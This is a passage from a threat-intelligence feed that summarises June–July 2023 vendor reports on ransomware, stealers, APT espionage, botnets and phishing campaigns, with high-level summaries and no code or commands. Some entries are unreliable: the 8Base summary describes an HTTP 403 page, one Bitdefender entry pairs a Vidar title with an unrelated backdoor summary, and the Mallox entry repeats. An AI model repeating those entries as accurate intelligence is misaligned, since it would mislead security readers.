- Date of Scan:
- 2023-07-07
- Impact:
- MEDIUM
- Summary:
- Checkpoint researchers have identified a campaign where a Chinese threat actor targeting government entities in Europe, with a focus on foreign and domestic policy entities.
Source:
https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Diving_Deep_into_Emotet_Malware_Family
- Date of Scan:
- 2023-07-07
- Impact:
- LOW
- Summary:
- Emotet is a malware family active since 2014, operated by a cybercrime group known as Mealybug or TA542. It is launched multiple spam campaigns since it re-appeared after its takedown. Also, Mealybug created multiple new modules and multiple times updated and improved all existing modules.
Source:
https://www.welivesecurity.com/2023/07/06/whats-up-with-emotet/
—
- Intel Source:
- Elastic
- Intel Name:
- New_Variant_of_North_Korea_linked_RUSTBUCKET_macOS_Malware
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- Researchers from the Elastic Security Labs have spotted a new variant of the RustBucket Apple macOS malware. It allows operators to download and execute various payloads.
Source:
https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket
—
- Intel Source:
- CERT-UA
- Intel Name:
- Attackers_Targeting_North_Atlantic_Treaty_Organization
- Date of Scan:
- 2023-07-06
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have discovered the website, which copies the English version of the web resource of the international non-governmental organization “World Congress of Ukrainians” legitimate page.
—
- Intel Source:
- Sentinelone
- Intel Name:
- Neo_Nets_eCrime_campaign_targeted_financial_institutions
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- SentinelLabs has been tracking Neo_Net conducted an eCrime campaign targeting clients of financial institutions, primarily in Spain and Chile. Using SMS phishing messages and fake banking pages, Neo_Net stole over 350,000 EUR and compromised personal information of thousands of victims. The campaign involved renting out infrastructure, selling victim data, and offering a Smishing-as-a-Service platform.
Source:
https://www.sentinelone.com/blog/neo_net-the-kingpin-of-spanish-ecrime/
—
- Intel Source:
- Quickheal
- Intel Name:
- White_Snake_stealer_threat
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- Quick heal researchers provided the technical aspects of the updated White snake stealer version 1.6, to provide insights into its behaviour and shed light on its latest capabilities.
—
- Intel Source:
- Cyble
- Intel Name:
- Multiple_New_Clipper_Malware_Variants
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- Cyble researchers discovered several Clipper malware variants, including Laplas Clipper, IBAN Clipper, Keona Clipper, and many others in the past. Recently, they observed several variants of Clipper malware and saw a significant number of samples related to these variants being submitted to VirusTotal. The Clipper malware operates by cunningly hijacking cryptocurrency transactions, stealthily replacing the victim’s wallet address with that of the Threat Actors’ (TAs) wallet address. Suppose an unsuspecting user tries to pay from their cryptocurrency account, and the transaction has been diverted to an entirely different recipient (the account of the TAs instead of the intended recipient). This alarming turn of events can lead to significant financial losses and potential devastation for the victim.
Source:
https://blog.cyble.com/2023/06/30/multiple-new-clipper-malware-variants-discovered-in-the-wild/
—
- Intel Source:
- Sekoia
- Intel Name:
- NoName_057_16_DDoSia_Project_Gets_an_Upgrade
- Date of Scan:
- 2023-07-06
- Impact:
- LOW
- Summary:
- Researchers from Sekoia have analyzed an updated variant of the DDoSia attack tool that was developed and used by the pro-Russia collective NoName(057)16.
Source:
https://blog.sekoia.io/following-noname05716-ddosia-projects-targets/
—
- Intel Source:
- Avast
- Intel Name:
- Decryption_tool_for_the_Akira_ransomware
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- Researchers for Avast have developed a decryptor for the Akira ransomware and released it for public download. The Akira ransomware appeared in March 2023 and since then, the gang claims successful attacks on various organizations in the education, finance and real estate industries, amongst others.
Source:
https://decoded.avast.io/threatresearch/decrypted-akira-ransomware/
—
- Intel Source:
- Inky
- Intel Name:
- Malicious_QR_Codes_are_getting_to_employee_credentials
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- INKY recently discovered multitude of QR Code phish and shared their findings.
—
- Intel Source:
- ASEC
- Intel Name:
- Crysis_Threat_Actor_Using_RDP_to_Install_Venus_Ransomware
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- ASEC researchers have disclosed that the Crysis ransomware’s threat actor is also using the Venus ransomware in the attacks. Crysis and Venus are both major ransomware types known to target externally exposed remote desktop services.
—
- Intel Source:
- Uptycs
- Intel Name:
- Meduza_Stealer
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- Recently, while monitoring the Uptycs Threat Research team dscovered a menace named The Meduza Stealer. Created by an enigmatic actor known as ‘Meduza’, this malware has been specifically designed to target Windows users and organizations, currently targeting only ten specific countries. The Meduza Stealer has a purpose to perform data theft. It pilfers users’ browsing activities, extracting a wide array of browser-related data. From critical login credentials to the valuable record of browsing history and meticulously curated bookmarks, no digital artifact is safe. Even crypto wallet extensions, password managers, and 2FA extensions are vulnerable.
Source:
https://www.uptycs.com/blog/what-is-meduza-stealer-and-how-does-it-work
—
- Intel Source:
- Sophos
- Intel Name:
- Th_connection_investigation_of_2_clients_in_2_threat_hunts
- Date of Scan:
- 2023-07-05
- Impact:
- LOW
- Summary:
- Two clients, two threat hunts have been researched for any connection between them. Using Microsoft’s cloud-security API to parse piles of disparate data leads to captivation results.
—
- Intel Source:
- Wordfence
- Intel Name:
- Hackers_Exploiting_Unpatched_WordPress_Plugin_Flaw
- Date of Scan:
- 2023-07-05
- Impact:
- HIGH
- Summary:
- Wordfence researchers have identified the unpatched privilege escalation vulnerability being actively exploited in Ultimate Member, a WordPress plugin installed on over 200,000 sites. Also, discovered that this vulnerability is being actively exploited and it hasn’t been adequately patched in the latest version available, which is 2.6.6.
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_being_executed_using_DNS_TXT_records
- Date of Scan:
- 2023-07-04
- Impact:
- LOW
- Summary:
- The AhnLab Security Emergency response Center (ASEC) has discovered instances where malware is being executed using DNS TXT records. This method of malware execution is significant because it is not commonly utilized, making it challenging to detect and analyze.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Ransomware_Entrapped_in_WinSCP_by_Blackcat_Operators
- Date of Scan:
- 2023-07-04
- Impact:
- LOW
- Summary:
- TrendMicro researchers have identified malicious actors using malvertising to distribute malware via cloned webpages of legitimate organizations. The distribution involved a webpage of the well-known application WinSCP, an open-source Windows application for file transfer.
—
- Intel Source:
- Deep Instinct
- Intel Name:
- New_C2_Framework_Leveraging_by_MuddyWater
- Date of Scan:
- 2023-07-04
- Impact:
- LOW
- Summary:
- Deep Instinct researchers have observed the Iranian state-sponsored group dubbed MuddyWater has been attributed to a previously unseen command-and-control (C2) framework called PhonyC2 that’s been put to use by the actor since 2021.
—
- Intel Source:
- ISC. SANS
- Intel Name:
- Updated_GuLoader_loader
- Date of Scan:
- 2023-07-03
- Impact:
- LOW
- Summary:
- This blog post on the SANS Internet Storm Center website details an infection chain for the Remcos RAT malware. It explains how the infection began with a malicious email containing a zip archive, which resulted in the download of a password-protected zip file. Inside this zip file, there was a decoy audio file and a malicious Windows shortcut. The Windows shortcut triggered the execution of a VBS file with a PowerShell script, leading to further infection on the host. The post also provides indicators of compromise (IOCs) including email headers and file hashes.
—
- Intel Source:
- Cofense
- Intel Name:
- HMRC_Self_Assessment_Phish_Outsmart_SEGs
- Date of Scan:
- 2023-07-03
- Impact:
- LOW
- Summary:
- During the busy self-assessment season in the UK, threat actors take advantage of the heightened online activity to deceive unsuspecting individuals into revealing their sensitive information on fraudulent HM Revenue & Customs (HMRC) self-assessment websites. Phishing Defense Center (PDC) has noted this wave of attacks across various sectors and regrettably, these phishing emails often evade popular secure email gateways (SEGs) that are meant to provide protection for users. The phishing emails begin by pressuring users to immediately update their self-assessment online profile. This is a common tactic employed by threat actors to generate a deceptive perception of urgency and legitimacy.
—
- Intel Source:
- ASEC
- Intel Name:
- Malware_Disguised_as_HWP_Document_File_Kimsuky
- Date of Scan:
- 2023-07-03
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) has discovered that the Kimsuky threat group is distributing malware disguised as HWP document files. The malware is a compressed file containing a readme.txt file and an executable file with an HWP document file extension. Running the executable file decodes a PowerShell command and saves it as update.vbs in the %APPDATA% folder. The update.vbs file conducts malicious activities, including the leakage of user credentials.
—
- Intel Source:
- Morphisec
- Intel Name:
- GuLoader_Campaign_Targets_Law_Firms_in_the_US
- Date of Scan:
- 2023-07-03
- Impact:
- LOW
- Summary:
- the GuLoader campaign from infecting systems was discussed that the campaign’s targeting of specific industries and highlights the use of legitimate hosting services for distributing malware. The main focus is on the delivery of the Remcos RAT through GuLoader and how Morphisec’s AMTD technology can protect systems from these attacks.
Source:
https://blog.morphisec.com/guloader-campaign-targets-law-firms-in-the-us
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_Threats_analyses_June11_17_2023
- Date of Scan:
- 2023-07-02
- Impact:
- LOW
- Summary:
- The ASEC analysis team keeps monitoring phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from June 11th to June 17th, 2023 and provide statistical information on each type.
—
- Intel Source:
- vmware
- Intel Name:
- 8Base_Ransomware
- Date of Scan:
- 2023-07-02
- Impact:
- LOW
- Summary:
- The 8Base ransomware group has remained relatively unknown despite the massive spike in activity in Summer of 2023. The subpage provides information about an HTTP 403 error, but does not offer any further details.
Source:
https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html
—
- Intel Source:
- PaloAlto
- Intel Name:
- Detecting_Popular_Cobalt_Strike_Malleable_C2_Profile_Techniques
- Date of Scan:
- 2023-07-02
- Impact:
- LOW
- Summary:
- Overall, Unit 42 researchers have discovered two Cobalt Strike Team Server instances hosted online. They have also found new malleable C2 profiles that are not publicly available, which attackers use to avoid detection and exploit Cobalt Strike. They have also found new malleable C2 profiles that are not publicly available, which attackers use to avoid detection and exploit Cobalt Strike. The operators of these Team Server instances hide their C2 infrastructure using popular services and public cloud infrastructure providers. Additionally, the researchers have provided guidance for Palo Alto Networks customers on how to receive protection and mitigation against Cobalt Strike Beacon and other related Cobalt Strike tools.
Source:
https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2/
—
- Intel Source:
- volexity
- Intel Name:
- Charming_Kitten_updates_backdoor_called_POWERSTAR
- Date of Scan:
- 2023-07-02
- Impact:
- MEDIUM
- Summary:
- Volexity reserachers very often sees one threat actor that using techniques is Charming Kitten, who is assumed to be operating out of Iran. Charming Kitten is primarily concerned with collecting intelligence by compromising account credentials and, the email of individuals they successfully spear phishing. The new version of POWERSTAR backddor was analyzed by the Volexity team and led the to the discovery that Charming Kitten has been spreading their malware alongside their spear-phishing techniques.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Manic_Menagerie_2_0_threat_actor
- Date of Scan:
- 2023-07-01
- Impact:
- MEDIUM
- Summary:
- Unit 42 researchers discovered an active campaign that aims several web hosting and IT providers in the United States and European Union from late 2020 to late 2022. Unit 42 assumes the activity associated with this campaign as CL-CRI-0021 and believes it stems from the same threat actor responsible for the previous campaign known as Manic Menagerie.
Source:
https://unit42.paloaltonetworks.com/manic-menagerie-targets-web-hosting-and-it/
—
- Intel Source:
- Sentilone
- Intel Name:
- The_exposion_of_active_adversary_JokerSpy
- Date of Scan:
- 2023-07-01
- Impact:
- LOW
- Summary:
- The researchers at BitDefender and Elastic have discovered an active adversary starting a novel spyware, cross-platform backdoors and an open-source reconnaissance tool to compromise organizations with macOS devices in their cortege. So far there are not a lot of known victims at this time, the analysis suggest that the threat actors have likely targeted other organizations. Sentilone reserachers shared their key components and indicators used in the campaign to help raise awareness and aid security teams and threat hunters.
—
- Intel Source:
- Fortinet
- Intel Name:
- New_Fast_Developing_ThirdEye_Infostealer
- Date of Scan:
- 2023-06-30
- Impact:
- LOW
- Summary:
- FortiGuard Labs recently discovered some files that look suspicious. Their investigation discovered that the files are malicious and revealed there is more to them than meets the eye: they are a previously unseen infostealer that was named “ThirdEye”. While this malware is not considered sophisticated, it’s targeting to steal various information from compromised machines that can be used as step for future attacks.
—
- Intel Source:
- Cofense
- Intel Name:
- Malicious_Actors_deploy_phishing_pages_to_mobile_devices
- Date of Scan:
- 2023-06-30
- Impact:
- LOW
- Summary:
- The Cofense Phishing Defense Center analysts has discovered a spike in the number of malicious emails utilizing this attack vector. In order to bypass traditional file and text detection software, QR codes provide threat actors with a different tactic to encode malicious URLs.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_Analysis_June_5_June_11th_2023
- Date of Scan:
- 2023-06-29
- Impact:
- LOW
- Summary:
- The ASEC analysis team keeps monitoring a weekly malware collection samples for June 5-11th, 2023. They used their automatic analysis system RAPIT to categorize and respond to known malware.The top malwares for this week are Amadey, Lokibot, Guloader, AgentTesla and Formbook.
—
- Intel Source:
- Avanan
- Intel Name:
- PDF_Based_Attacks_Are_Becoming_More_Common
- Date of Scan:
- 2023-06-28
- Impact:
- LOW
- Summary:
- Researchers from Avanan have deep-dived into PDF-based attacks and identified that the malicious PDF file masquerades as a legitimate ‘DocuSign’ document, luring unsuspecting users to a fraudulent webpage where they are asked to enter their login credentials, including the recipient’s email address.
Source:
https://www.avanan.com/blog/pdf-based-attacks-on-the-rise-heres-how-deep-learning-can-prevent-them
—
- Intel Source:
- Cyble
- Intel Name:
- Linux_Users_at_Risk_From_Akira_Ransomware
- Date of Scan:
- 2023-06-28
- Impact:
- LOW
- Summary:
- Cyble researchers have recently shared crucial details about the activities of a newly identified ransomware group known as “Akira.” This group is actively targeting numerous organizations, compromising their sensitive data. It is worth noting that Akira ransomware has expanded its operations to include the Linux platform.
Source:
https://blog.cyble.com/2023/06/28/akira-ransomware-extends-reach-to-linux-platform/
—
- Intel Source:
- Krebson Security
- Intel Name:
- SMS_Phishers_hacked_sensitive_data_from_UPS_Tracking_Tool
- Date of Scan:
- 2023-06-27
- Impact:
- LOW
- Summary:
- The United Parcel Service (UPS) says fraudsters have been harvesting phone numbers and other information from its online shipment tracking tool in Canada to send highly targeted SMS phishing (a.k.a. “smishing”) messages that spoofed UPS and other top brands.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Black_Basta_ransomware_cover_of_roundup
- Date of Scan:
- 2023-06-27
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs analysts analyzed data on ransomware variants that have been gaining intrest within their datasets and the OSINT community. Their Ransomware Roundup report shares with readers the brief insights into the evolving ransomware landscape and the Fortinet solutions that protect against those variants.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-black-basta
—
- Intel Source:
- Cybergeeks
- Intel Name:
- The_details_of_the_Saltwater_Backdoor_used_in_Barracuda_vulnerability
- Date of Scan:
- 2023-06-27
- Impact:
- MEDIUM
- Summary:
- SALTWATER is a backdoor that exploiting the Barracuda 0-day vulnerability CVE-2023-2868. It is a module for the Barracuda SMTP daemon called bsmtpd. The malware hooked the recv, send, and close functions using an open-source hooking library called funchook. The following functionalities are implemented: execute arbitrary commands, download and upload files, proxy functionality, and tunneling functionality.
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- The_Examination_of_Trickbot_and_Conti_Crypters
- Date of Scan:
- 2023-06-27
- Impact:
- LOW
- Summary:
- IBM Security X-Force researchers have deep-dived into the crypters used by the Trickbot/Conti syndicate.
Source:
https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/
—
- Intel Source:
- Cyble
- Intel Name:
- The_details_of_Wagner_Groups_Cyber_campaign
- Date of Scan:
- 2023-06-27
- Impact:
- LOW
- Summary:
- Cyble researchers investigated a new ransomware called Wagner. This ransomware is possible a variant of Chaos ransomware. The reserachers analyzed that the ransom note insists users to join the PMC Wagner. It was discovered that the ransomware sample was initially submitted on VirusTotal from Russia. Because the ransom note is written in Russian, it assumes that the ransomware may primarily target victims within Russia. The Wagner ransomware is a 32-bit binary targeting the Windows operating system.
Source:
https://blog.cyble.com/2023/06/27/unveiling-wagner-groups-cyber-recruitment/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Email_Spam_using_Modiloader_Attachments
- Date of Scan:
- 2023-06-26
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed 2 emails attachment in quarantine that had different text with the same attachment.
Source:
https://isc.sans.edu/diary/Email+Spam+with+Attachment+Modiloader/29978/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Word_Document_with_Online_Template_Attached
- Date of Scan:
- 2023-06-26
- Impact:
- LOW
- Summary:
- Researchers from SANS has been found behaving like a dropper. It uses a remote Word template and makes an HTTP request to an external website.
Source:
https://isc.sans.edu/diary/Word+Document+with+an+Online+Attached+Template/29976/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Qakbot_Distributing_Tag_via_Obama_Series
- Date of Scan:
- 2023-06-24
- Impact:
- LOW
- Summary:
- Qakbot using the Obama-series distribution tag has been active this week on Tuesday 2023-06-20 (obama269), Wednesday 2023-06-21 (obama270), and Thursday 2023-06-22 (obama271).
Source:
https://isc.sans.edu/diary/Qakbot+Qbot+activity+obama271+distribution+tag/29968/
—
- Intel Source:
- Deep Instinct
- Intel Name:
- Powerful_JavaScript_Dropper_PindOS_Spreading_Bumblebee_and_IcedID_Malware
- Date of Scan:
- 2023-06-24
- Impact:
- MEDIUM
- Summary:
- Deep Instinct researchers have observed a new strain of JavaScript dropper which is delivering next-stage payloads like Bumblebee and IcedID.
Source:
https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid
—
- Intel Source:
- TrendMicro
- Intel Name:
- An_Overview_of_Trigona_Ransomware_Various_Versions
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- The Trigona ransomware is a relatively new ransomware family that began activities around late October 2022 — although samples of it existed as early as June 2022. Since then, Trigona’s operators have remained highly active, and in fact, have been continuously updating their ransomware binaries.
Source:
https://www.trendmicro.com/en_us/research/23/f/an-overview-of-the-trigona-ransomware.html
—
- Intel Source:
- Checkpoint
- Intel Name:
- Hackers_Using_USB_Driven_Self_Propagating_Malware_to_Attack_the_Camaro_Dragon
- Date of Scan:
- 2023-06-23
- Impact:
- MEDIUM
- Summary:
- Checkpoint researchers have identified that the Chinese cyber espionage actor known as Camaro Dragonleveraging a new strain of self-propagating malware that spreads through compromised USB drives.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Multiple_IoT_Exploits_Used_in_Latest_Mirai_Campaign
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Paloalto researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet.
Source:
https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/
—
- Intel Source:
- Microsoft
- Intel Name:
- Cryptocurrency_Mining_Campaigns_Targeting_Linux_and_IoT_Devices
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Microsoft researchers have identified that Internet-facing Linux systems and Internet of Things (IoT) devices are being targeted as part of a new campaign designed to illicitly mine cryptocurrency.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Infection_Strategy_of_Mallox_Ransomware
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Two years ago, the new ransomware appeared known as “TargetCompany”. and got a lot of attention due to its unique method of appending the name of the targeted company as a file extension This ransomware variant was also noticed using a “.mallox” extension to encrypted files, linking it to its previous identification as “Mallox”. Last year, Cyble Research analysts also observed a significant spike in the Mallox ransomware samples. Cyble analysts discovered a new variation of the Mallox ransomware that now appends the file extension “.malox” to the encrypted files, whereas previously, it used the “.mallox” extension. This ransomware binary is deployed using BatLoader, which is similar to the one reported – spreading RATs and Stealers.
Source:
https://blog.cyble.com/2023/06/22/mallox-ransomware-implements-new-infection-strategy/
—
- Intel Source:
- Krebson Security
- Intel Name:
- The_Service_in_question_rents_email_addresses
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- The service in question from KrebosSecurity blog was kopeechka[.]store — is a kind of unidirectional email confirmation-as-a-service that lures you to “save your time and money for successfully registering multiple accounts.” That new service offers to help to save and cut costs associated with large-scale spam and account creation campaigns, by paying people to sell their email account credentials and letting customers temporarily rent access to a vast pool of established accounts at major providers.
—
- Intel Source:
- Zscaler
- Intel Name:
- RedEnergy_Stealer_as_a_Ransomware_Attacks
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Zscaler researchers have discovered a new malware variant, RedEnergy stealer that fits into the hybrid Stealer-as-a-Ransomware threat category. RedEnergy stealer uses a fake update campaign to target multiple industry verticals and possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Infection_Strategy_Implemented_by_Mallox_Ransomware
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Cyble researchers have observed a new variation of the Mallox ransomware that now appends the file extension .malox to the encrypted files, whereas previously, it used the .mallox extension. This ransomware binary is deployed using BatLoader, which is similar to the one reported – spreading RATs and Stealers.
Source:
https://blog.cyble.com/2023/06/22/mallox-ransomware-implements-new-infection-strategy/
—
- Intel Source:
- Symantec
- Intel Name:
- Chinese_Hacking_Group_Flea_Targeting_American_Ministries
- Date of Scan:
- 2023-06-22
- Impact:
- MEDIUM
- Summary:
- Symantec researchers have identified that a Chinese state-sponsored actor named Flea targeting Foreign affairs ministries in the Americas as part of a recent campaign that spanned from late 2022 to early 2023.
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky_Distributing_CHM_Malware
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- ASEC researchers have continuously tracked the Kimsuky group’s APT attacks. While the Kimsuky group often used document files for malware distribution, there have been many recent cases where CHM files were used in distribution. Also, unlike in the past when the document files contained North Korea-related topics, the group is now attempting to attack using a variety of subjects.
—
- Intel Source:
- ASEC
- Intel Name:
- RedEyes_Group_Wiretapping_Individuals
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the redEyes (APT37) is a state-sponsored APT group targeting individuals. They recently used an Infostealer with wiretapping capabilities and a GoLang backdoor. Spear phishing emails were used for initial access, and Ably platform for command and control. Privilege escalation techniques were employed, and an Infostealer named FadeStealer stole data and wiretapped microphones.
—
- Intel Source:
- CERT-UA
- Intel Name:
- APT28_Group_Leveraging_Three_Roundcube_Exploits
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- CERT-UA researchers have discovered APT28 utilized three exploits targeting Roundcube (CVE-2020-35730, CVE-2021-44026, CVE-2020-12641) during a recent espionage campaign against a Ukrainian government organization. The attack involved malicious emails containing exploit code and JavaScript files for exfiltration
—
- Intel Source:
- PaloAlto
- Intel Name:
- Evaluation_of_Threat_Group_Muddled_Libra
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- PaloAlto researchers have identified that a new threat group dubbed “Muddled Libra” is targeting large outsourcing firms with multi-layered, persistent attacks that start with smishing and end with data theft. The group is also using the infrastructure that it compromises in downstream attacks on victims’ customers.
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- New_MULTI_STORM_Attack_Campaign_by_Python_Loader
- Date of Scan:
- 2023-06-22
- Impact:
- MEDIUM
- Summary:
- An interesting phishing campaign was recently analyzed by the Securonix Threat Research Team. The attack kicks off when the user clicks on a heavily obfuscated JavaScript file contained in a password protected zip file. The attack chain ends with the victim machine infected with multiple unique RAT (remote access trojan) malware instances, such as Warzone RAT and Quasar RAT. Both are used for command and control during different stages of the infection chain.
—
- Intel Source:
- Fortinet
- Intel Name:
- Condi_DDoS_Botnet_Spreading_Through_TP_Link_Vulnerability
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- Fortinet researchers have observed that a new DDoS-as-a-Service botnet called “Condi” emerged in May 2023, exploiting a vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to build an army of bots to conduct attacks.
Source:
https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389
—
- Intel Source:
- ASEC
- Intel Name:
- The_Examination_of_Ransomware_With_BAT_File_Extension_Attacking_MS_SQL_Servers
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the Mallox ransomware with the BAT file extension distributing to poorly managed MS-SQL servers. Extensions of files distributed to poorly managed MS-SQL servers include not only EXE but also BAT, which is a fileless format. The files distributed with the BAT file extension that has been discovered so far are Remcos RAT and Mallox.
—
- Intel Source:
- ASEC
- Intel Name:
- Disguised_malware_as_a_security_update_installer
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- AhnLab recently discovered the attack of a hacking group that is supported by a certain government. The discovered malware disguised itself as a security update installer and was developed using the Inno Setup software.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_analysis_June_4_10_2023
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- The ASEC analysis team keep monitoring phishing email threats with their automatic sample analysis system (RAPIT) and honeypot. Their post explained the samples of distribution of phishing emails during the week from June 4, 2023 to June 10th, 2023. They covered the cases of distribution of phishing emails during the week from June 4th, 2023 to June 10th, 2022 and provide statistical information on each type.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Malware_Campaign_Targeting_LetsVPN_Users
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered the existence of numerous counterfeit LetsVPN websites while conducting a routine threat-hunting exercise. These fraudulent sites share a common user interface and are deliberately designed to distribute malware, masquerading as the genuine LetsVPN application.
Source:
https://blog.cyble.com/2023/06/16/new-malware-campaign-targets-letsvpn-users/
—
- Intel Source:
- eSentire
- Intel Name:
- The_Analysis_of_Resident_Campaign
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- eSentire researchers have observed the resurgence of what we believe to be a malicious campaign targeting manufacturing, commercial, and healthcare organizations.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
—
- Intel Source:
- Esentire
- Intel Name:
- DcRAT_a_clone_of_AsyncRAT
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- In May 2023, eSentire identified DcRAT, a clone of AsyncRAT, at a consumer services customer. DcRAT is a remote access tool with info-stealing and ransomware capabilities. The malware is actively distributed using explicit lures for OnlyFans pages and other adult content.
—
- Intel Source:
- Esentire
- Intel Name:
- Aurora_Stealer_malware_analysis
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- The subpage discusses the Aurora Stealer malware targeting the manufacturing industry through fake downloads distributed via Google Ads. The malware gathers sensitive data, has a pricing plan, and is written in the Go Programming language. It also provides indicators of compromise and recommendations for protection against the malware.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-aurora-stealer
—
- Intel Source:
- Bitdefender
- Intel Name:
- Hackers_Running_an_Active_Cryptojacking_Campaign
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- Bitdefender security researchers have discovered a threat group likely based in Romania that’s been active since at least 2020. They’ve been targeting Linux-based machines with weak SSH credentials, mainly to deploy Monero mining malware, but their toolbox allows for other kinds of attacks.
—
- Intel Source:
- Team Cymru
- Intel Name:
- The_Aesi_Return_with_Darth_Vidar
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- Researchers from Team-Cymru have observed that Vidar threat actors continue to rotate their backend IP infrastructure, favoring providers in Moldova and Russia.
Source:
https://www.team-cymru.com/post/darth-vidar-the-aesir-strike-back
—
- Intel Source:
- Fortinet
- Intel Name:
- New_Ransomware_Variant_Big_Head
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- FortiGuard Labs have recently come across a new ransomware variant called Big Head, which came out in May 2023. Although there are at least three variants of Big Head ransomware, all are designed to encrypt files on victims’ machines to extort money, like other ransomware variants.
Source:
https://www.fortinet.com/blog/threat-research/fortiguard-labs-ransomware-roundup-big-head
—
- Intel Source:
- Checkpoint
- Intel Name:
- Attackers_Abusing_Legitimate_Services_For_Credential_Theft
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- Check Point researchers have detected an ongoing phishing campaign that uses legitimate services for credential harvesting and data exfiltration in order to evade detection.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Malware_Delivering_Through_Dot_inf_File
- Date of Scan:
- 2023-06-20
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed the .inf files and observed that it is delivering malware.
—
- Intel Source:
- ASEC
- Intel Name:
- Tsunami_DDoS_Malware_Distributing_to_Linux_SSH_Servers
- Date of Scan:
- 2023-06-20
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have discovered an attack campaign that consists of the Tsunami DDoS Bot being installed on inadequately managed Linux SSH servers. Not only did the threat actor install Tsunami, but they also installed various other malware such as ShellBot, XMRig CoinMiner, and Log Cleaner.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Hackers_Targeting_Middle_Eastern_and_African_Governments_with_Advanced_Techniques
- Date of Scan:
- 2023-06-20
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have identified that Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques.
—
- Intel Source:
- Bitdefender
- Intel Name:
- The_Aesir_Return_with_Darth_Vidar
- Date of Scan:
- 2023-06-20
- Impact:
- LOW
- Summary:
- BitDefender researchers have identified the behaviors in a recent incident investigated by them, where a presumably custom malware tracked by researchers as Logutil backdoor was deployed. The operation was active for more than a year with the end goal of compromising credentials and data exfiltration.
—
- Intel Source:
- ASEC
- Intel Name:
- RecordBreaker_Infostealer_Disguised_as_a_Dot_NET_Installer
- Date of Scan:
- 2023-06-20
- Impact:
- LOW
- Summary:
